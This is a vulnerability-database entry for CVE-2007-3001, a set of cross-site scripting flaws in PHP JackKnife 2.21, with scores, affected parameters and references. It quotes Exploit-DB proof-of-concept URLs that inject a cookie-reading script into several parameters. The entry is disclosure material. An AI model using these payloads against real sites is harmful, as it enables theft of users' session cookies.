CVE-2007-3001
Published 2007-06-04
Priority: P4 19 | medium | 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.90% (77.0th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in PHP JackKnife (PHPJK) allow remote attackers to inject arbitrary web script or HTML via (1) the sUName parameter to UserArea/Authenticate.php, (2) the sAccountUnq parameter to UserArea/NewAccounts/index.php, or the (3) iCategoryUnq, (4) iDBLoc, (5) iTtlNumItems, (6) iNumPerPage, or (7) sSort parameter to G_Display.php, different vectors than CVE-2005-4239.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_jackknife | php_jackknife | — | — |
No detection rules found.
Exploit-DB
PHP JackKnife 2.21 - '(PHPJK) G_Display.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2007-05-31
---
source: https://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq= '">alert(document.cookie)
http://www.example.com/PHPJK/G_Display.php?iDBLoc= '">alert(document.cookie)
http://www.example.com/PHPJK/G_Display.php?iTtlNumItems= '">alert(document.cookie)
http://www.example.com/PHPJK/G_Display.php?&iNumPerP
Exploit-DB
PHP JackKnife 2.21 - '/(PHPJK) UserArea/NewAccounts/index.php?sAccountUnq' Cross-Site Scripting
exploitdb·2007-05-31
---
source: https://www.securityfocus.com/bid/24253/info
http://www.example.com/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq= '">alert(document.cookie)
Exploit-DB
PHP JackKnife 2.21 - '/(PHPJK) UserArea/Authenticate.php?sUName' Cross-Site Scripting
exploitdb·2007-05-31
---
source: https://www.securityfocus.com/bid/24253/info
http://www.example.com/PHPJK/UserArea/Authenticate.php?sUName= '">alert(document.cookie)
No writeups or analysis indexed.
http://osvdb.org/38877
http://osvdb.org/38878
http://osvdb.org/38879
http://securityreason.com/securityalert/2768
http://www.securityfocus.com/archive/1/470111/100/0/threaded
http://www.securityfocus.com/bid/24253
https://exchange.xforce.ibmcloud.com/vulnerabilities/34643
Published: 2007-06-04